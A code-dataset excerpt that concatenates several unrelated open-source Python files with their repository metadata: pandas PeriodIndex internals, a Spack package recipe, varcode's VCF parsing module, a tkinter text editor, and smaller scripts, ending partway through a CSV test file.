try:
_, parsed, reso = parse_time_string(label, self.freq)
bounds = self._parsed_string_to_bounds(reso, parsed)
return bounds[0 if side == 'left' else 1]
except Exception:
raise KeyError(label)
elif is_integer(label) or is_float(label):
self._invalid_indexer('slice', label)
return label
def _parsed_string_to_bounds(self, reso, parsed):
if reso == 'year':
t1 = Period(year=parsed.year, freq='A')
elif reso == 'month':
t1 = Period(year=parsed.year, month=parsed.month, freq='M')
elif reso == 'quarter':
q = (parsed.month - 1) // 3 + 1
t1 = Period(year=parsed.year, quarter=q, freq='Q-DEC')
elif reso == 'day':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
freq='D')
elif reso == 'hour':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, freq='H')
elif reso == 'minute':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, minute=parsed.minute, freq='T')
elif reso == 'second':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, minute=parsed.minute,
second=parsed.second, freq='S')
else:
raise KeyError(reso)
return (t1.asfreq(self.freq, how='start'),
t1.asfreq(self.freq, how='end'))
def _get_string_slice(self, key):
if not self.is_monotonic:
raise ValueError('Partial indexing only valid for '
'ordered time series')
key, parsed, reso = parse_time_string(key, self.freq)
grp = resolution.Resolution.get_freq_group(reso)
freqn = resolution.get_freq_group(self.freq)
if reso in ['day', 'hour', 'minute', 'second'] and not grp < freqn:
raise KeyError(key)
t1, t2 = self._parsed_string_to_bounds(reso, parsed)
return slice(self.searchsorted(t1.ordinal, side='left'),
self.searchsorted(t2.ordinal, side='right'))
def _convert_tolerance(self, tolerance, target):
tolerance = DatetimeIndexOpsMixin._convert_tolerance(self, tolerance,
target)
if target.size != tolerance.size and tolerance.size > 1:
raise ValueError('list-like tolerance size must match '
'target index size')
return self._maybe_convert_timedelta(tolerance)
def insert(self, loc, item):
if not isinstance(item, Period) or self.freq != item.freq:
return self.astype(object).insert(loc, item)
idx = np.concatenate((self[:loc].asi8, np.array([item.ordinal]),
self[loc:].asi8))
return self._shallow_copy(idx)
def join(self, other, how='left', level=None, return_indexers=False,
sort=False):
"""
See Index.join
"""
self._assert_can_do_setop(other)
result = Int64Index.join(self, other, how=how, level=level,
return_indexers=return_indexers,
sort=sort)
if return_indexers:
result, lidx, ridx = result
return self._apply_meta(result), lidx, ridx
return self._apply_meta(result)
def _assert_can_do_setop(self, other):
super(PeriodIndex, self)._assert_can_do_setop(other)
if not isinstance(other, PeriodIndex):
raise ValueError('can only call with other PeriodIndex-ed objects')
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
def _wrap_union_result(self, other, result):
name = self.name if self.name == other.name else None
result = self._apply_meta(result)
result.name = name
return result
def _apply_meta(self, rawarr):
if not isinstance(rawarr, PeriodIndex):
rawarr = PeriodIndex._from_ordinals(rawarr, freq=self.freq,
name=self.name)
return rawarr
def _format_native_types(self, na_rep=u('NaT'), date_format=None,
**kwargs):
values = self.astype(object).values
if date_format:
formatter = lambda dt: dt.strftime(date_format)
else:
formatter = lambda dt: u('%s') % dt
if self.hasnans:
mask = self._isnan
values[mask] = na_rep
imask = ~mask
values[imask] = np.array([formatter(dt) for dt
in values[imask]])
else:
values = np.array([formatter(dt) for dt in values])
return values
def __setstate__(self, state):
"""Necessary for making this object picklable"""
if isinstance(state, dict):
super(PeriodIndex, self).__setstate__(state)
elif isinstance(state, tuple):
# < 0.15 compat
if len(state) == 2:
nd_state, own_state = state
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
# backcompat
self.freq = Period._maybe_convert_freq(own_state[1])
else: # pragma: no cover
data = np.empty(state)
np.ndarray.__setstate__(self, state)
self._data = data
else:
raise Exception("invalid pickle state")
_unpickle_compat = __setstate__
def tz_convert(self, tz):
"""
Convert tz-aware DatetimeIndex from one time zone to another (using
pytz/dateutil)
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding UTC time.
Returns
-------
normalized : DatetimeIndex
Notes
-----
Not currently implemented for PeriodIndex
"""
raise NotImplementedError("Not yet implemented for PeriodIndex")
def tz_localize(self, tz, ambiguous='raise'):
"""
Localize tz-naive DatetimeIndex to given time zone (using
pytz/dateutil), or remove timezone from tz-aware DatetimeIndex
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding local time.
Returns
-------
localized : DatetimeIndex
Notes
-----
Not currently implemented for PeriodIndex
"""
raise NotImplementedError("Not yet implemented for PeriodIndex")
PeriodIndex._add_comparison_methods()
PeriodIndex._add_numeric_methods_disabled()
PeriodIndex._add_logical_methods_disabled()
PeriodIndex._add_datetimelike_methods()
def _get_ordinal_range(start, end, periods, freq, mult=1):
if com._count_not_none(start, end, periods) != 2:
raise ValueError('Of the three parameters: start, end, and periods, '
'exactly two must be specified')
if freq is not None:
_, mult = _gfc(freq)
if start is not None:
start = Period(start, freq)
if end is not None:
end = Period(end, freq)
is_start_per = isinstance(start, Period)
is_end_per = isinstance(end, Period)
if is_start_per and is_end_per and start.freq != end.freq:
raise ValueError('start and end must have same freq')
if (start is tslib.NaT or end is tslib.NaT):
raise ValueError('start and end must not be NaT')
if freq is None:
if is_start_per:
freq = start.freq
elif is_end_per:
freq = end.freq
else: # pragma: no cover
raise ValueError('Could not infer freq from start/end')
if periods is not None:
periods = periods * mult
if start is None:
data = np.arange(end.ordinal - periods + mult,
end.ordinal + 1, mult,
dtype=np.int64)
else:
data = np.arange(start.ordinal, start.ordinal + periods, mult,
dtype=np.int64)
else:
data = np.arange(start.ordinal, end.ordinal + 1, mult, dtype=np.int64)
return data, freq
def _range_from_fields(year=None, month=None, quarter=None, day=None,
hour=None, minute=None, second=None, freq=None):
if hour is None:
hour = 0
if minute is None:
minute = 0
if second is None:
second = 0
if day is None:
day = 1
ordinals = []
if quarter is not None:
if freq is None:
freq = 'Q'
base = frequencies.FreqGroup.FR_QTR
else:
base, mult = _gfc(freq)
if base != frequencies.FreqGroup.FR_QTR:
raise AssertionError("base must equal FR_QTR")
year, quarter = _make_field_arrays(year, quarter)
for y, q in zip(year, quarter):
y, m = _quarter_to_myear(y, q, freq)
val = period.period_ordinal(y, m, 1, 1, 1, 1, 0, 0, base)
ordinals.append(val)
else:
base, mult = _gfc(freq)
arrays = _make_field_arrays(year, month, day, hour, minute, second)
for y, mth, d, h, mn, s in zip(*arrays):
ordinals.append(period.period_ordinal(
y, mth, d, h, mn, s, 0, 0, base))
return np.array(ordinals, dtype=np.int64), freq
def _make_field_arrays(*fields):
length = None
for x in fields:
if isinstance(x, (list, np.ndarray, ABCSeries)):
if length is not None and len(x) != length:
raise ValueError('Mismatched Period array lengths')
elif length is None:
length = len(x)
arrays = [np.asarray(x) if isinstance(x, (np.ndarray, list, ABCSeries))
else np.repeat(x, length) for x in fields]
return arrays
def pnow(freq=None):
# deprecation, xref #13790
warnings.warn("pd.pnow() and pandas.core.indexes.period.pnow() "
"are deprecated. Please use Period.now()",
FutureWarning, stacklevel=2)
return Period.now(freq=freq)
def period_range(start=None, end=None, periods=None, freq='D', name=None):
"""
Return a fixed frequency PeriodIndex, with day (calendar) as the default
frequency
Parameters
----------
start : string or period-like, default None
Left bound for generating periods
end : string or period-like, default None
Right bound for generating periods
periods : integer, default None
Number of periods to generate
freq : string or DateOffset, default 'D' (calendar daily)
Frequency alias
name : string, default None
Name of the resulting PeriodIndex
Notes
-----
Of the three parameters: ``start``, ``end``, and ``periods``, exactly two
must be specified.
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Returns
-------
prng : PeriodIndex
Examples
--------
>>> pd.period_range(start='2017-01-01', end='2018-01-01', freq='M')
PeriodIndex(['2017-01', '2017-02', '2017-03', '2017-04', '2017-05',
'2017-06', '2017-06', '2017-07', '2017-08', '2017-09',
'2017-10', '2017-11', '2017-12', '2018-01'],
dtype='period[M]', freq='M')
If ``start`` or ``end`` are ``Period`` objects, they will be used as anchor
endpoints for a ``PeriodIndex`` with frequency matching that of the
``period_range`` constructor.
>>> pd.period_range(start=pd.Period('2017Q1', freq='Q'),
... end=pd.Period('2017Q2', freq='Q'), freq='M')
PeriodIndex(['2017-03', '2017-04', '2017-05', '2017-06'],
dtype='period[M]', freq='M')
"""
if com._count_not_none(start, end, periods) != 2:
raise ValueError('Of the three parameters: start, end, and periods, '
'exactly two must be specified')
return PeriodIndex(start=start, end=end, periods=periods,
freq=freq, name=name)
| 34.462257 | 84 | 0.583213 |
4a224ece89facd012619a2773268fec5a79a92a7 | 223 | py | Python | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 55 | 2019-02-28T23:58:42.000Z | 2020-07-14T22:01:45.000Z | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 72 | 2019-04-04T18:46:30.000Z | 2020-06-24T02:47:57.000Z | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 7 | 2019-04-02T17:53:30.000Z | 2020-06-23T16:17:58.000Z | import os
import sys
# all scripts should be run from the repository root so we need to insert cwd to path
# to import docs
sys.path.insert(0, os.getcwd())
if __name__ == "__main__":
from docs import run
run()
| 15.928571 | 85 | 0.699552 |
4a224edb492c51ccd21b3750224bbc772b1a912e | 747 | py | Python | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from baseparser import BaseParser
from config import Config
class StockIdNameMapFile(BaseParser):
def __init__(self, filepath):
BaseParser.__init__(self, filepath)
self._map = {}
pass
def doparse(self):
with open(self._filepath) as f:
for line in f:
for i in line.split(")"):
items = i.split("(")
if len(items) != 2:
continue
self._map[int(items[1].strip())] = items[0].strip()
pass
def verify(slef):
return False
if __name__ == "__main__":
smf = StockIdNameMapFile(Config.STOCK_ID_NAME_MAP_SHA)
smf.doparse()
print smf._map[600505]
pass
| 24.096774 | 71 | 0.551539 |
4a224f6998f945cb15486608b7627b542f6ce82b | 1,354 | py | Python | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360 | 2017-11-06T08:47:01.000Z | 2022-03-31T14:45:33.000Z | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838 | 2017-11-04T07:49:45.000Z | 2022-03-31T23:38:39.000Z | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793 | 2017-11-04T07:45:50.000Z | 2022-03-30T14:31:53.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Apfel(AutotoolsPackage):
"""APFEL is a library able to perform DGLAP evolution up to NNLO in QCD and
to NLO in QED, both with pole and MSbar masses. The coupled DGLAP
QCD+QED evolution equations are solved in x-space by means of higher
order interpolations and Runge-Kutta techniques."""
homepage = "https://github.com/scarrazza/apfel"
url = "https://github.com/scarrazza/apfel/archive/3.0.4.tar.gz"
tags = ['hep']
version('3.0.4', sha256='c7bfae7fe2dc0185981850f2fe6ae4842749339d064c25bf525b4ef412bbb224')
depends_on('swig', when='+python')
depends_on('python', when='+python', type=('build', 'run'))
depends_on('lhapdf', when='+lhapdf', type=('build', 'run'))
variant('python', description='Build python wrapper', default=False)
variant('lhapdf', description='Link to LHAPDF', default=False)
def configure_args(self):
args = []
if self.spec.satisfies('~python'):
args.append('--disable-pywrap')
else:
args.append('--enable-pywrap')
args += self.enable_or_disable('lhapdf')
return args
| 35.631579 | 95 | 0.674298 |
4a225007f34592685ca413e49a1138f533fcf479 | 17,660 | py | Python | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | 2 | 2021-05-24T12:33:13.000Z | 2022-02-28T04:39:53.000Z | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | null | null | null | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, division
import os
import requests
import zlib
import logging
from collections import OrderedDict
from warnings import warn
from six.moves import urllib
import pandas
from typechecks import require_string
import vcf as pyvcf
from .reference import infer_genome
from .variant import Variant, variant_ascending_position_sort_key
from .variant_collection import VariantCollection
logger = logging.getLogger(__name__)
def load_vcf(
path,
genome=None,
reference_vcf_key="reference",
only_passing=True,
allow_extended_nucleotides=False,
include_info=True,
chunk_size=10 ** 5,
max_variants=None,
sort_key=variant_ascending_position_sort_key,
distinct=True):
"""
Load reference name and Variant objects from the given VCF filename.
This is an experimental faster implementation of `load_vcf`. It is
typically about 2X faster, and with `include_info=False`, about 4X faster.
If most of the records in the VCF have failed filters (and
only_passing=True), this function can be orders of magnitude faster than
`load_vcf`.
Currently only local files are supported by this function (no http). If you
call this on an HTTP URL, it will fall back to `load_vcf`.
Parameters
----------
path : str
Path to VCF (*.vcf) or compressed VCF (*.vcf.gz).
genome : {pyensembl.Genome, reference name, Ensembl version int}, optional
Optionally pass in a PyEnsembl Genome object, name of reference, or
PyEnsembl release version to specify the reference associated with a
VCF (otherwise infer reference from VCF using reference_vcf_key)
reference_vcf_key : str, optional
Name of metadata field which contains path to reference FASTA
file (default = 'reference')
only_passing : boolean, optional
If true, any entries whose FILTER field is not one of "." or "PASS" is
dropped.
allow_extended_nucleotides : boolean, default False
Allow characters other that A,C,T,G in the ref and alt strings.
include_info : boolean, default True
Whether to parse the INFO and per-sample columns. If you don't need
these, set to False for faster parsing.
chunk_size: int, optional
Number of records to load in memory at once.
max_variants : int, optional
If specified, return only the first max_variants variants.
sort_key : fn
Function which maps each element to a sorting criterion.
Set to None to not to sort the variants.
distinct : boolean, default True
Don't keep repeated variants
"""
require_string(path, "Path or URL to VCF")
parsed_path = parse_url_or_path(path)
if parsed_path.scheme and parsed_path.scheme.lower() != "file":
# pandas.read_table nominally supports HTTP, but it tends to crash on
# large files and does not support gzip. Switching to the python-based
# implementation of read_table (with engine="python") helps with some
# issues but introduces a new set of problems (e.g. the dtype parameter
# is not accepted). For these reasons, we're currently not attempting
# to load VCFs over HTTP with pandas directly, and instead download it
# to a temporary file and open that.
(filename, headers) = urllib.request.urlretrieve(path)
try:
# The downloaded file has no file extension, which confuses pyvcf
# for gziped files in Python 3. We rename it to have the correct
# file extension.
new_filename = "%s.%s" % (
filename, parsed_path.path.split(".")[-1])
os.rename(filename, new_filename)
filename = new_filename
return load_vcf(
filename,
genome=genome,
reference_vcf_key=reference_vcf_key,
only_passing=only_passing,
allow_extended_nucleotides=allow_extended_nucleotides,
include_info=include_info,
chunk_size=chunk_size,
max_variants=max_variants,
sort_key=sort_key,
distinct=distinct)
finally:
logger.info("Removing temporary file: %s", filename)
os.unlink(filename)
# Loading a local file.
# The file will be opened twice: first to parse the header with pyvcf, then
# by pandas to read the data.
# PyVCF reads the metadata immediately and stops at the first line with
# data. We can close the file after that.
handle = PyVCFReaderFromPathOrURL(path)
handle.close()
genome = infer_genome_from_vcf(
genome,
handle.vcf_reader,
reference_vcf_key)
df_iterator = read_vcf_into_dataframe(
path,
include_info=include_info,
sample_names=handle.vcf_reader.samples if include_info else None,
chunk_size=chunk_size)
if include_info:
def sample_info_parser(unparsed_sample_info_strings, format_string):
"""
Given a format string like "GT:AD:ADP:DP:FS"
and a list of sample info strings where each entry is like
"0/1:3,22:T=3,G=22:25:33", return a dict that maps:
sample name -> field name -> value. Uses pyvcf to parse the fields.
"""
return pyvcf_calls_to_sample_info_list(
handle.vcf_reader._parse_samples(
unparsed_sample_info_strings, format_string, None))
else:
sample_info_parser = None
return dataframes_to_variant_collection(
df_iterator,
source_path=path,
info_parser=handle.vcf_reader._parse_info if include_info else None,
only_passing=only_passing,
max_variants=max_variants,
sample_names=handle.vcf_reader.samples if include_info else None,
sample_info_parser=sample_info_parser,
variant_kwargs={
'ensembl': genome,
'allow_extended_nucleotides': allow_extended_nucleotides},
variant_collection_kwargs={
'sort_key': sort_key,
'distinct': distinct})
def load_vcf_fast(*args, **kwargs):
"""
Same as load_vcf, keeping this name for backwards compatibility.
"""
warn(
"load_vcf_fast is deprecated and has been renamed to load_vcf",
DeprecationWarning)
return load_vcf(*args, **kwargs)
def pyvcf_calls_to_sample_info_list(calls):
"""
Given pyvcf.model._Call instances, return a dict mapping each sample
name to its per-sample info:
sample name -> field -> value
"""
return OrderedDict(
(call.sample, call.data._asdict()) for call in calls)
def dataframes_to_variant_collection(
dataframes,
source_path,
info_parser=None,
only_passing=True,
max_variants=None,
sample_names=None,
sample_info_parser=None,
variant_kwargs={},
variant_collection_kwargs={}):
"""
Load a VariantCollection from an iterable of pandas dataframes.
This takes an iterable of dataframes instead of a single dataframe to avoid
having to load huge dataframes at once into memory. If you have a single
dataframe, just pass it in a single-element list.
Parameters
----------
dataframes
Iterable of dataframes (e.g. a generator). Expected columns are:
["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER"]
and 'INFO' if `info_parser` is not Null. Columns must be in this
order.
source_path : str
Path of VCF file from which DataFrame chunks were generated.
info_parser : string -> object, optional
Callable to parse INFO strings.
only_passing : boolean, optional
If true, any entries whose FILTER field is not one of "." or "PASS" is
dropped.
max_variants : int, optional
If specified, return only the first max_variants variants.
sample_names : list of strings, optional
Sample names. The final columns of the dataframe should match these.
If specified, the per-sample info columns will be parsed. You must
also specify sample_info_parser.
sample_info_parser : string list * string -> dict, optional
Callable to parse per-sample info columns.
variant_kwargs : dict, optional
Additional keyword paramters to pass to Variant.__init__
variant_collection_kwargs : dict, optional
Additional keyword parameters to pass to VariantCollection.__init__.
"""
expected_columns = (
["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER"] +
(["INFO"] if info_parser else []))
if info_parser and sample_names:
if sample_info_parser is None:
raise TypeError(
"Must specify sample_info_parser if specifying sample_names")
expected_columns.append("FORMAT")
expected_columns.extend(sample_names)
variants = []
metadata = {}
try:
for chunk in dataframes:
assert chunk.columns.tolist() == expected_columns,\
"dataframe columns (%s) do not match expected columns (%s)" % (
chunk.columns, expected_columns)
for tpl in chunk.itertuples():
(i, chrom, pos, id_, ref, alts, qual, flter) = tpl[:8]
if flter == ".":
flter = None
elif flter == "PASS":
flter = []
elif only_passing:
continue
else:
flter = flter.split(';')
if id_ == ".":
id_ = None
qual = float(qual) if qual != "." else None
alt_num = 0
info = sample_info = None
for alt in alts.split(","):
if alt != ".":
if info_parser is not None and info is None:
info = info_parser(tpl[8]) # INFO column
if sample_names:
# Sample name -> field -> value dict.
sample_info = sample_info_parser(
list(tpl[10:]), # sample info columns
tpl[9], # FORMAT column
)
variant = Variant(
chrom,
int(pos), # want a Python int not numpy.int64
ref,
alt,
**variant_kwargs)
variants.append(variant)
metadata[variant] = {
'id': id_,
'qual': qual,
'filter': flter,
'info': info,
'sample_info': sample_info,
'alt_allele_index': alt_num,
}
if max_variants and len(variants) > max_variants:
raise StopIteration
alt_num += 1
except StopIteration:
pass
return VariantCollection(
variants=variants,
source_to_metadata_dict={source_path: metadata},
**variant_collection_kwargs)
def read_vcf_into_dataframe(
path,
include_info=False,
sample_names=None,
chunk_size=None):
"""
Load the data of a VCF into a pandas dataframe. All headers are ignored.
Parameters
----------
path : str
Path to local file. HTTP and other protocols are not implemented.
include_info : boolean, default False
If true, the INFO field is not parsed, but is included as a string in
the resulting data frame. If false, the INFO field is omitted.
sample_names: string list, optional
Sample names. The final columns of the dataframe should match these.
If specified (and include_info is also specified), the FORMAT and
per-sample info columns will be included in the result dataframe.
chunk_size : int, optional
If buffering is desired, the number of rows per chunk.
Returns
---------
If chunk_size is None (the default), a dataframe with the contents of the
VCF file. Otherwise, an iterable of dataframes, each with chunk_size rows.
"""
vcf_field_types = OrderedDict()
vcf_field_types['CHROM'] = str
vcf_field_types['POS'] = int
vcf_field_types['ID'] = str
vcf_field_types['REF'] = str
vcf_field_types['ALT'] = str
vcf_field_types['QUAL'] = str
vcf_field_types['FILTER'] = str
if include_info:
vcf_field_types['INFO'] = str
if sample_names:
vcf_field_types['FORMAT'] = str
for name in sample_names:
vcf_field_types[name] = str
parsed_path = parse_url_or_path(path)
if not parsed_path.scheme or parsed_path.scheme.lower() == "file":
path = parsed_path.path
else:
raise NotImplementedError("Only local files are supported.")
compression = None
if path.endswith(".gz"):
compression = "gzip"
elif path.endswith(".bz2"):
compression = "bz2"
reader = pandas.read_table(
path,
compression=compression,
comment="#",
chunksize=chunk_size,
dtype=vcf_field_types,
names=list(vcf_field_types),
usecols=range(len(vcf_field_types)))
return reader
class PyVCFReaderFromPathOrURL(object):
"""
Thin wrapper over a PyVCF Reader object that supports loading over URLs,
and a close() function (pyvcf somehow doesn't have a close() funciton).
Attributes
----------
path : string or None
path that was loaded, if available.
vcf_reader : pyvcf Reader instance
"""
def __init__(self, path):
"""
Construct a new wrapper.
Parameters
----------
path : string or pyvcf Reader instance
Path or URL to load, or Reader instance.
"""
self.path = None # string path, if available.
self.vcf_reader = None # vcf_reader. Will always be set.
self._to_close = None # object to call close() on when we're done.
if isinstance(path, pyvcf.Reader):
self.vcf_reader = path
else:
require_string(path, "Path or URL to VCF")
self.path = path
parsed_path = parse_url_or_path(path)
if not parsed_path.scheme or parsed_path.scheme.lower() == 'file':
self.vcf_reader = pyvcf.Reader(
filename=parsed_path.path,
strict_whitespace=True)
elif parsed_path.scheme.lower() in ("http", "https", "ftp"):
self._to_close = response = requests.get(path, stream=True)
response.raise_for_status() # raise error on 404, etc.
if path.endswith(".gz"):
lines = stream_gzip_decompress_lines(
response.iter_content())
else:
lines = response.iter_lines(decode_unicode=True)
self.vcf_reader = pyvcf.Reader(
fsock=lines,
compressed=False,
strict_whitespace=True)
else:
raise ValueError("Unsupported scheme: %s" % parsed_path.scheme)
def close(self):
if self._to_close is not None:
self._to_close.close()
def stream_gzip_decompress_lines(stream):
"""
Uncompress a gzip stream into lines of text.
Parameters
----------
Generator of chunks of gzip compressed text.
Returns
-------
Generator of uncompressed lines.
"""
dec = zlib.decompressobj(zlib.MAX_WBITS | 16)
previous = ""
for compressed_chunk in stream:
chunk = dec.decompress(compressed_chunk).decode()
if chunk:
lines = (previous + chunk).split("\n")
previous = lines.pop()
for line in lines:
yield line
yield previous
def infer_genome_from_vcf(genome, vcf_reader, reference_vcf_key):
"""
Helper function to make a pyensembl.Genome instance.
"""
if genome:
return infer_genome(genome)
elif reference_vcf_key not in vcf_reader.metadata:
raise ValueError("Unable to infer reference genome for %s" % (
vcf_reader.filename,))
else:
reference_path = vcf_reader.metadata[reference_vcf_key]
return infer_genome(reference_path)
def parse_url_or_path(s):
# urlparse will parse paths with two leading slashes (e.g. "//foo")
# in a strange way. We collapse these paths to start with just one
# slash.
if s.startswith("//"):
s = "/" + s.lstrip("/")
return urllib.parse.urlparse(s)
| 35.604839 | 79 | 0.611268 |
4a2250b698c50b645fb80d2a694a0b983bc706a9 | 4,367 | py | Python | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 29 | 2019-09-02T21:15:59.000Z | 2022-01-14T02:20:05.000Z | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 2 | 2020-08-20T05:48:36.000Z | 2021-06-02T03:16:31.000Z | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 38 | 2019-10-20T14:29:12.000Z | 2022-03-27T19:50:05.000Z | import tkinter as tk
from tkinter import ttk, filedialog, messagebox
text_contents = dict()
def check_for_changes():
current = get_text_widget()
content = current.get("1.0", "end-1c")
name = notebook.tab("current")["text"]
if hash(content) != text_contents[str(current)]:
if name[-1] != "*":
notebook.tab("current", text=name + "*")
elif name[-1] == "*":
notebook.tab("current", text=name[:-1])
def get_text_widget():
current_tab = notebook.nametowidget(notebook.select())
text_widget = current_tab.winfo_children()[0]
return text_widget
def close_current_tab():
current = get_text_widget()
if current_tab_unsaved() and not confirm_close():
return
if len(notebook.tabs()) == 1:
create_file()
notebook.forget(current)
def current_tab_unsaved():
text_widget = get_text_widget()
content = text_widget.get("1.0", "end-1c")
return hash(content) != text_contents[str(text_widget)]
def confirm_close():
return messagebox.askyesno(
message="You have unsaved changes. Are you sure you want to close?",
icon="question",
title="Unsaved changes",
)
def confirm_quit():
unsaved = False
for tab in notebook.tabs():
tab_widget = root.nametowidget(tab)
text_widget = tab_widget.winfo_children()[0]
content = text_widget.get("1.0", "end-1c")
if hash(content) != text_contents[str(text_widget)]:
unsaved = True
break
if unsaved and not confirm_close():
return
root.destroy()
def create_file(content="", title="Untitled"):
container = ttk.Frame(notebook)
container.pack()
text_area = tk.Text(container)
text_area.insert("end", content)
text_area.pack(side="left", fill="both", expand=True)
notebook.add(container, text=title)
notebook.select(container)
text_contents[str(text_area)] = hash(content)
text_scroll = ttk.Scrollbar(container, orient="vertical", command=text_area.yview)
text_scroll.pack(side="right", fill="y")
text_area["yscrollcommand"] = text_scroll.set
def open_file():
file_path = filedialog.askopenfilename()
try:
filename = file_path.split("/")[-1]
with open(file_path, "r") as file:
content = file.read()
except (AttributeError, FileNotFoundError):
print("Open operation cancelled")
return
create_file(content, filename)
def save_file():
file_path = filedialog.asksaveasfilename()
try:
filename = file_path.split("/")[-1]
text_widget = get_text_widget()
content = text_widget.get("1.0", "end-1c")
with open(file_path, "w") as file:
file.write(content)
except (AttributeError, FileNotFoundError):
print("Save operation cancelled")
return
notebook.tab("current", text=filename)
text_contents[str(text_widget)] = hash(content)
def show_about_info():
messagebox.showinfo(
title="About",
message="The Teclado Text Editor is a simple tabbed text editor designed to help you learn Tkinter!",
)
root = tk.Tk()
root.title("Teclado Text Editor")
root.option_add("*tearOff", False)
main = ttk.Frame(root)
main.pack(fill="both", expand=True, padx=(1), pady=(4, 0))
menubar = tk.Menu(root)
root.config(menu=menubar)
file_menu = tk.Menu(menubar)
help_menu = tk.Menu(menubar)
menubar.add_cascade(menu=file_menu, label="File")
menubar.add_cascade(menu=help_menu, label="Help")
file_menu.add_command(label="New", command=create_file, accelerator="Ctrl+N")
file_menu.add_command(label="Open...", command=open_file, accelerator="Ctrl+O")
file_menu.add_command(label="Save", command=save_file, accelerator="Ctrl+S")
file_menu.add_command(
label="Close Tab", command=close_current_tab, accelerator="Ctrl+Q"
)
file_menu.add_command(label="Exit", command=confirm_quit)
help_menu.add_command(label="About", command=show_about_info)
notebook = ttk.Notebook(main)
notebook.pack(fill="both", expand=True)
create_file()
root.bind("<KeyPress>", lambda event: check_for_changes())
root.bind("<Control-n>", lambda event: create_file())
root.bind("<Control-o>", lambda event: open_file())
root.bind("<Control-q>", lambda event: close_current_tab())
root.bind("<Control-s>", lambda event: save_file())
root.mainloop()
| 26.149701 | 109 | 0.672544 |
4a22516d2e24493c290c24853c4acadea66a3dd1 | 4,882 | py | Python | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | null | null | null | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | null | null | null | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | 1 | 2021-03-18T12:38:36.000Z | 2021-03-18T12:38:36.000Z | from numbers import Number
import tempfile
import unittest
from datetime import date, datetime
from context import *
# from rezchaincsv.exceptions import ItemWrong, MapWrong
REQUIRED = {
"reference": "Common Reference ID",
"amount": "Amount",
"currency": "Currency",
"status": "Booking Status",
"last_modified": "Last Modified Date",
}
OPTIONAL = {
"checkin": "Check In Date",
"checkout": "Check Out Date",
"nights": "Number Of Nights",
